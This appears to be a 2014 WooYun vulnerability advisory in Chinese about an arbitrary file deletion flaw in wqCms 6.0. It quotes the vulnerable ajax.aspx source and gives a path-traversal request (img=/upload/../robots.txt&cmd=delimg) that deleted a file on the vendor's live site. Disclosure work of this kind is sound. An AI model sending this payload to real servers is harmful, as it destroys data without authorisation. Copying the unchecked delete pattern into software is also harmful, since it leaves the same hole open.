当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065309

漏洞标题:wqCms6.0 任意文件删除

相关厂商:wangqi.com

漏洞作者: what_news

提交时间:2014-06-26 10:51

修复时间:2014-09-21 10:52

公开时间:2014-09-21 10:52

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-26: 细节已通知厂商并且等待厂商处理中
2014-07-01: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-08-25: 细节向核心白帽子及相关领域专家公开
2014-09-04: 细节向普通白帽子公开
2014-09-14: 细节向实习白帽子公开
2014-09-21: 细节向公众公开

简要描述:

网奇最新版 存在任意文件删除
访问
<code>http://cms.wangqi.com/ajax.aspx</code>

详细说明:

ajax.aspx

http://cms.wangqi.com/ajax.aspx


源码如下

public void Page_Load(object sender, EventArgs e)
{
switch (base.Request.Form["cmd"])
{
case "newsVars":
this.method_18();
return;
case "userJson":
this.method_19();
return;
case "digg":
this.method_20();
return;
case "login":
this.method_21(false);
return;
case "loginAdm":
this.method_21(true);
return;
case "titleDuplicate":
this.method_16();
return;
case "selSort":
this.method_22();
return;
case "msgRecent":
this.method_25();
return;
case "msgFriends":
this.method_26();
return;
case "msgGet":
this.method_27();
return;
case "msgPost":
this.method_28();
return;
case "friendAdd":
this.method_23();
return;
case "friendRemove":
this.method_24();
return;
case "usernameValid":
this.method_17();
return;
case "serverSet":
this.method_15();
return;
case "delimg":
this.method_14(); //跟进
return;
.......


private void method_14()
{
if ((!string.IsNullOrEmpty(base.Request.Form["img"]) && (base.Request.Form["img"].ToLower().IndexOf("/upload/") > -1)) && File.Exists(base.Server.MapPath(base.Request.Form["img"])))
{
File.Delete(base.Server.MapPath(base.Request.Form["img"])); //没处理..可跳出这个目录对任意文件进行删除了
}
if (!string.IsNullOrEmpty(base.Request.Form["imgID"]) && (Convert.ToInt32(base.Request.Form["imgID"]) > 0))
{
base.dbHelper.ExecuteNonQuery(CommandType.Text, "delete from wqcms_imgList where imgID=" + Convert.ToInt32(base.Request.Form["imgID"]), new IDataParameter[0]);
}
}

漏洞证明:

为了证明可以任意删除文件
我先访问下面的文件 是存在的

http://cms.wangqi.com/robots.txt


711.png


好的现在把这个文件删除了
访问

http://cms.wangqi.com/ajax.aspx


提交

img=/upload/../robots.txt&cmd=delimg


712.png


然后在访问

http://cms.wangqi.com/robots.txt


713.png


删除了 同样可以删除任意文件

修复方案:

过滤 .. 防止跳出upload目录

版权声明:转载请注明来源 what_news@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-21 10:52

厂商回复:

最新状态:

暂无